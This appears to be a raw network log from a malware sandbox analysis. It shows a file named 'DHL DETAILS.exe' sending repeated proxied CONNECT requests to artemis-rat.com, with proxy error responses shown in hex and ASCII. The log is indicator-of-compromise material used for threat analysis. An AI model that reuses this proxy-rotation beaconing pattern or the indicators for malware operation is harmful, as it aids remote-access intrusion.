                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1260192.168.2.55370694.45.74.6080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.089713097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1261192.168.2.55367391.202.230.21980806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.089875937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1262192.168.2.55371494.177.106.17823246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.091238022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1263192.168.2.55197093.90.212.241536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.092529058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1264192.168.2.553669218.65.6.15031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.093507051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1265192.168.2.553333138.36.199.1441536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.096921921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1266192.168.2.5537498.213.137.155406352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.096924067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.833302975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.884516954 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1267192.168.2.552506125.227.225.15733896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.097130060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1268192.168.2.551867103.76.253.6631296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.097130060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177088022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1269192.168.2.551982199.229.254.12941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.098941088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1270192.168.2.553063117.160.250.13088996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.102027893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.945498943 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1271192.168.2.55373182.137.244.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.102101088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1272192.168.2.5537478.130.34.23790906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.102145910 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:18.435964108 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1273192.168.2.553485117.160.250.16380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.102432013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.935461044 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1274192.168.2.55370993.171.220.22988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.104597092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1275192.168.2.5537548.213.137.1551356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.111196995 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:18.870842934 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1276192.168.2.553760206.220.175.241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.138062954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1277192.168.2.55375643.128.146.42156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.138268948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1278192.168.2.55216550.63.12.33528146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.143188000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177133083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.176959038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1279192.168.2.5537558.213.137.15510816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.143349886 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:18.870929956 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1280192.168.2.55288298.181.137.8341456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.245903969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1281192.168.2.553784104.21.194.182806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.246144056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.400392056 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1282192.168.2.553757171.250.222.1310806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.246237040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036412954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1283192.168.2.55375847.243.114.19281806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.246516943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1284192.168.2.553787172.67.182.102806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.249123096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.405886889 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1285192.168.2.553798172.67.181.85806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.249177933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.406197071 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1286192.168.2.553774103.152.112.167806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.253303051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.427706003 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1287192.168.2.55380574.48.7.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.253314972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.414180994 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.25.3
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
